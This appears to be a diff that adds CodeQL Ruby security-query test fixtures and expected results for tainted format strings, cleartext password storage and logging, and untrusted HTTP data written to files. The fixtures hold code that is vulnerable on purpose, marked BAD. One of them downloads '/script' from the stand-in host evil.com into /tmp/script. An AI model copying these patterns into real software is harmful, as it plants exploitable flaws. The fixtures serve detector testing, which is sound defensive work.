--- a/ruby/ql/test/query-tests/security/cwe-134/tainted_format_string.rb
+++ b/ruby/ql/test/query-tests/security/cwe-134/tainted_format_string.rb
@@ -0,0 +1,38 @@
+class UsersController < ActionController::Base
+
+  def show
+    printf(params[:format], arg) # BAD
+    Kernel.printf(params[:format], arg) # BAD
+    
+    printf(params[:format]) # GOOD
+    Kernel.printf(params[:format]) # GOOD
+
+    printf(IO.new(1), params[:format], arg) # BAD
+    Kernel.printf(IO.new(1), params[:format], arg) # BAD
+
+    printf("%s", params[:format]) # GOOD
+    Kernel.printf("%s", params[:format]) # GOOD
+    fmt = "%s"
+    printf(fmt, params[:format]) # GOOD
+
+    printf(IO.new(1), params[:format]) # GOOD [FALSE POSITIVE]
+    Kernel.printf(IO.new(1), params[:format]) # GOOD [FALSE POSITIVE]
+    
+    str1 = Kernel.sprintf(params[:format], arg) # BAD
+    str2 = sprintf(params[:format], arg) # BAD
+
+    str1 = Kernel.sprintf(params[:format]) # GOOD
+    str2 = sprintf(params[:format]) # GOOD
+    
+    stdout = IO.new 1
+    stdout.printf(params[:format], arg) # BAD
+
+    stdout.printf(params[:format]) # GOOD
+    
+    # Taint via string concatenation
+    printf("A log message: " + params[:format], arg) # BAD
+
+    # Taint via string interpolation
+    printf("A log message: #{params[:format]}", arg) # BAD
+  end
+end
--- a/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected
+++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected
@@ -71,7 +71,7 @@ subpaths
 | logging.rb:23:33:23:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" :  | logging.rb:23:33:23:40 | password | Sensitive data returned by $@ is logged here. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password |
 | logging.rb:26:18:26:34 | "pw: #{...}" | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" :  | logging.rb:26:18:26:34 | "pw: #{...}" | Sensitive data returned by $@ is logged here. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password |
 | logging.rb:28:26:28:33 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" :  | logging.rb:28:26:28:33 | password | Sensitive data returned by $@ is logged here. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password |
-| logging.rb:37:20:37:34 | ...[...] | logging.rb:30:8:30:55 | call to [] :  | logging.rb:37:20:37:34 | ...[...] | Sensitive data returned by $@ is logged here. | logging.rb:30:8:30:55 | call to [] | an write to password |
+| logging.rb:37:20:37:34 | ...[...] | logging.rb:30:8:30:55 | call to [] :  | logging.rb:37:20:37:34 | ...[...] | Sensitive data returned by $@ is logged here. | logging.rb:30:8:30:55 | call to [] | a write to password |
 | logging.rb:39:20:39:34 | ...[...] | logging.rb:34:1:34:15 | call to []= :  | logging.rb:39:20:39:34 | ...[...] | Sensitive data returned by $@ is logged here. | logging.rb:34:1:34:15 | call to []= | a write to password |
 | logging.rb:69:20:69:50 | password_masked_ineffective_sub | logging.rb:59:35:59:68 | "ca497451f5e883662fb1a37bc9ec7838" :  | logging.rb:69:20:69:50 | password_masked_ineffective_sub | Sensitive data returned by $@ is logged here. | logging.rb:59:35:59:68 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub |
 | logging.rb:69:20:69:50 | password_masked_ineffective_sub | logging.rb:63:35:63:88 | call to sub :  | logging.rb:69:20:69:50 | password_masked_ineffective_sub | Sensitive data returned by $@ is logged here. | logging.rb:63:35:63:88 | call to sub | an assignment to password_masked_ineffective_sub |
--- a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected
+++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected
@@ -0,0 +1,62 @@
+edges
+| app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" :  | app/controllers/users_controller.rb:5:39:5:50 | new_password |
+| app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" :  | app/controllers/users_controller.rb:7:41:7:52 | new_password |
+| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  | app/controllers/users_controller.rb:13:42:13:53 | new_password |
+| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  | app/controllers/users_controller.rb:15:49:15:60 | new_password |
+| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  | app/controllers/users_controller.rb:15:87:15:98 | new_password |
+| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" :  | app/controllers/users_controller.rb:21:45:21:56 | new_password |
+| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" :  | app/controllers/users_controller.rb:21:83:21:94 | new_password |
+| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" :  | app/controllers/users_controller.rb:28:27:28:38 | new_password |
+| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" :  | app/controllers/users_controller.rb:30:28:30:39 | new_password |
+| app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" :  | app/controllers/users_controller.rb:37:39:37:50 | new_password |
+| app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" :  | app/controllers/users_controller.rb:44:21:44:32 | new_password |
+| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" :  | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" |
+| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" :  | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" |
+| app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" :  | app/models/user.rb:5:27:5:38 | new_password |
+| app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" :  | app/models/user.rb:11:22:11:33 | new_password |
+| app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" :  | app/models/user.rb:17:21:17:32 | new_password |
+nodes
+| app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" :  | semmle.label | "043697b96909e03ca907599d6420555f" :  |
+| app/controllers/users_controller.rb:5:39:5:50 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:7:41:7:52 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  | semmle.label | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  |
+| app/controllers/users_controller.rb:13:42:13:53 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:15:49:15:60 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:15:87:15:98 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" :  | semmle.label | "504d224a806cf8073cd14ef08242d422" :  |
+| app/controllers/users_controller.rb:21:45:21:56 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:21:83:21:94 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" :  | semmle.label | "7d6ae08394c3f284506dca70f05995f6" :  |
+| app/controllers/users_controller.rb:28:27:28:38 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:30:28:30:39 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" :  | semmle.label | "ff295f8648a406c37fbe378377320e4c" :  |
+| app/controllers/users_controller.rb:37:39:37:50 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" :  | semmle.label | "78ffbec583b546bd073efd898f833184" :  |
+| app/controllers/users_controller.rb:44:21:44:32 | new_password | semmle.label | new_password |
+| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" :  | semmle.label | "0157af7c38cbdd24f1616de4e5321861" :  |
+| app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | semmle.label | "password: #{...}\\n" |
+| app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | semmle.label | "password: #{...}" |
+| app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" :  | semmle.label | "06c38c6a8a9c11a9d3b209a3193047b4" :  |
+| app/models/user.rb:5:27:5:38 | new_password | semmle.label | new_password |
+| app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" :  | semmle.label | "52652fb5c709fb6b9b5a0194af7c6067" :  |
+| app/models/user.rb:11:22:11:33 | new_password | semmle.label | new_password |
+| app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" :  | semmle.label | "f982bf2531c149a8a1444a951b12e830" :  |
+| app/models/user.rb:17:21:17:32 | new_password | semmle.label | new_password |
+subpaths
+#select
+| app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" :  | app/controllers/users_controller.rb:5:39:5:50 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | app/controllers/users_controller.rb:5:39:5:50 | new_password | here |
+| app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" :  | app/controllers/users_controller.rb:7:41:7:52 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | here |
+| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  | app/controllers/users_controller.rb:13:42:13:53 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | app/controllers/users_controller.rb:13:42:13:53 | new_password | here |
+| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  | app/controllers/users_controller.rb:15:49:15:60 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | app/controllers/users_controller.rb:15:49:15:60 | new_password | here |
+| app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" :  | app/controllers/users_controller.rb:15:87:15:98 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | app/controllers/users_controller.rb:15:87:15:98 | new_password | here |
+| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" :  | app/controllers/users_controller.rb:21:45:21:56 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | app/controllers/users_controller.rb:21:45:21:56 | new_password | here |
+| app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" :  | app/controllers/users_controller.rb:21:83:21:94 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:19:20:19:53 | "504d224a806cf8073cd14ef08242d422" | an assignment to new_password | app/controllers/users_controller.rb:21:83:21:94 | new_password | here |
+| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" :  | app/controllers/users_controller.rb:28:27:28:38 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | app/controllers/users_controller.rb:28:27:28:38 | new_password | here |
+| app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" :  | app/controllers/users_controller.rb:30:28:30:39 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:26:20:26:53 | "7d6ae08394c3f284506dca70f05995f6" | an assignment to new_password | app/controllers/users_controller.rb:30:28:30:39 | new_password | here |
+| app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" :  | app/controllers/users_controller.rb:37:39:37:50 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:35:20:35:53 | "ff295f8648a406c37fbe378377320e4c" | an assignment to new_password | app/controllers/users_controller.rb:37:39:37:50 | new_password | here |
+| app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" :  | app/controllers/users_controller.rb:44:21:44:32 | new_password | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:42:20:42:53 | "78ffbec583b546bd073efd898f833184" | an assignment to new_password | app/controllers/users_controller.rb:44:21:44:32 | new_password | here |
+| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" :  | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | app/controllers/users_controller.rb:61:25:61:53 | "password: #{...}\\n" | here |
+| app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" :  | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | Sensitive data returned by $@ is stored $@. | app/controllers/users_controller.rb:58:20:58:53 | "0157af7c38cbdd24f1616de4e5321861" | an assignment to new_password | app/controllers/users_controller.rb:64:35:64:61 | "password: #{...}" | here |
+| app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" :  | app/models/user.rb:5:27:5:38 | new_password | Sensitive data returned by $@ is stored $@. | app/models/user.rb:3:20:3:53 | "06c38c6a8a9c11a9d3b209a3193047b4" | an assignment to new_password | app/models/user.rb:5:27:5:38 | new_password | here |
+| app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" :  | app/models/user.rb:11:22:11:33 | new_password | Sensitive data returned by $@ is stored $@. | app/models/user.rb:9:20:9:53 | "52652fb5c709fb6b9b5a0194af7c6067" | an assignment to new_password | app/models/user.rb:11:22:11:33 | new_password | here |
+| app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" :  | app/models/user.rb:17:21:17:32 | new_password | Sensitive data returned by $@ is stored $@. | app/models/user.rb:15:20:15:53 | "f982bf2531c149a8a1444a951b12e830" | an assignment to new_password | app/models/user.rb:17:21:17:32 | new_password | here |
--- a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.qlref
+++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.qlref
@@ -0,0 +1 @@
+queries/security/cwe-312/CleartextStorage.ql
--- a/ruby/ql/test/query-tests/security/cwe-312/app/controllers/users_controller.rb
+++ b/ruby/ql/test/query-tests/security/cwe-312/app/controllers/users_controller.rb
@@ -0,0 +1,74 @@
+class UsersController < ApplicationController
+  def createLikeCall
+    new_password = "043697b96909e03ca907599d6420555f"
+    # BAD: plaintext password stored to database
+    User.create(name: "U1", password: new_password)
+    # BAD: plaintext password stored to database
+    User.create({ name: "U1", password: new_password })
+  end
+
+  def updateLikeClassMethodCall
+    new_password = "083c9e1da4cc0c2f5480bb4dbe6ff141"
+    # BAD: plaintext password stored to database
+    User.update(1, name: "U1", password: new_password)
+    # BAD: plaintext password stored to database
+    User.update([1, 2], [{name: "U1", password: new_password}, {name: "U2", password: new_password}])
+  end
+
+  def insertAllLikeCall
+    new_password = "504d224a806cf8073cd14ef08242d422"
+    # BAD: plaintext password stored to database
+    User.insert_all([{name: "U1", password: new_password}, {name: "U2", password: new_password}])
+  end
+
+  def updateLikeInstanceMethodCall
+    user = User.find(1)
+    new_password = "7d6ae08394c3f284506dca70f05995f6"
+    # BAD: plaintext password stored to database
+    user.update(password: new_password)
+    # BAD: plaintext password stored to database
+    user.update({password: new_password})
+  end
+
+  def updateAttributeCall
+    user = User.find(1)
+    new_password = "ff295f8648a406c37fbe378377320e4c"
+    # BAD: plaintext password stored to database
+    user.update_attribute("password", new_password)
+  end
+
+  def assignAttributeCall
+    user = User.find(1)
+    new_password = "78ffbec583b546bd073efd898f833184"
+    # BAD: plaintext password assigned to database field
+    user.password = new_password
+    user.save
+  end
+
+  def hashedPasswordAssign
+    user = User.find(1)
+    new_password = "3746e149bfe3d6ccc665c3620d81cd2e"
+    hashed_password = hash_password(new_password)
+
+    # GOOD: assigned value is hashed
+    user.password = hashed_password
+  end
+
+  def fileWrites
+    new_password = "0157af7c38cbdd24f1616de4e5321861"
+
+    # BAD: plaintext password stored to disk
+    IO.write("foo.txt", "password: #{new_password}\n")
+
+    # BAD: plaintext password stored to disk
+    File.new("bar.txt", "a").puts("password: #{new_password}")
+  end
+
+  def randomPasswordAssign
+    user = User.find(1)
+    random_password = SecureRandom.hex(20)
+    # GOOD: the `random_password` value here looks like the hash of an unknown password
+    user.password = random_password
+    user.save
+  end
+end
--- a/ruby/ql/test/query-tests/security/cwe-312/app/models/user.rb
+++ b/ruby/ql/test/query-tests/security/cwe-312/app/models/user.rb
@@ -0,0 +1,20 @@
+class User < ActiveRecord::Base
+  def set_password_1
+    new_password = "06c38c6a8a9c11a9d3b209a3193047b4"
+    # BAD: directly storing a potential cleartext password to a field
+    self.update(password: new_password)
+  end
+
+  def set_password_2
+    new_password = "52652fb5c709fb6b9b5a0194af7c6067"
+    # BAD: directly storing a potential cleartext password to a field
+    update(password: new_password)
+  end
+
+  def set_password_3
+    new_password = "f982bf2531c149a8a1444a951b12e830"
+    # BAD: directly assigning a potential cleartext password to a field
+    self.password = new_password
+    self.save
+  end
+end
--- a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected
+++ b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected
@@ -0,0 +1,14 @@
+edges
+| http_to_file_access.rb:3:8:3:52 | call to body :  | http_to_file_access.rb:5:12:5:15 | resp |
+| http_to_file_access.rb:9:16:9:21 | call to params :  | http_to_file_access.rb:9:16:9:30 | ...[...] :  |
+| http_to_file_access.rb:9:16:9:30 | ...[...] :  | http_to_file_access.rb:11:18:11:23 | script |
+nodes
+| http_to_file_access.rb:3:8:3:52 | call to body :  | semmle.label | call to body :  |
+| http_to_file_access.rb:5:12:5:15 | resp | semmle.label | resp |
+| http_to_file_access.rb:9:16:9:21 | call to params :  | semmle.label | call to params :  |
+| http_to_file_access.rb:9:16:9:30 | ...[...] :  | semmle.label | ...[...] :  |
+| http_to_file_access.rb:11:18:11:23 | script | semmle.label | script |
+subpaths
+#select
+| http_to_file_access.rb:5:12:5:15 | resp | http_to_file_access.rb:3:8:3:52 | call to body :  | http_to_file_access.rb:5:12:5:15 | resp | $@ flows to file system | http_to_file_access.rb:3:8:3:52 | call to body | Untrusted data |
+| http_to_file_access.rb:11:18:11:23 | script | http_to_file_access.rb:9:16:9:21 | call to params :  | http_to_file_access.rb:11:18:11:23 | script | $@ flows to file system | http_to_file_access.rb:9:16:9:21 | call to params | Untrusted data |
--- a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.qlref
+++ b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.qlref
@@ -0,0 +1 @@
+queries/security/cwe-912/HttpToFileAccess.ql
--- a/ruby/ql/test/query-tests/security/cwe-912/http_to_file_access.rb
+++ b/ruby/ql/test/query-tests/security/cwe-912/http_to_file_access.rb
@@ -0,0 +1,19 @@
+require "net/http"
+
+resp = Net::HTTP.new("evil.com").get("/script").body
+file = File.open("/tmp/script", "w")
+file.write(resp) # BAD
+
+class ExampleController < ActionController::Base
+    def example
+      script = params[:script]
+      file = File.open("/tmp/script", "w")
+      file.write(script) # BAD
+    end
+
+    def example2
+      a = "a"
+      file = File.open("/tmp/script", "w")
+      file.write(a) # GOOD
+    end
+end
				`@@ -0,0 +1 @@`
				`queries/security/cwe-020/IncompleteHostnameRegExp.ql`
				`@@ -0,0 +1 @@`
				`queries/security/cwe-134/TaintedFormatString.ql`
				`@@ -0,0 +1 @@`
				`queries/security/cwe-312/CleartextStorage.ql`
				`@@ -0,0 +1 @@`
				`queries/security/cwe-912/HttpToFileAccess.ql`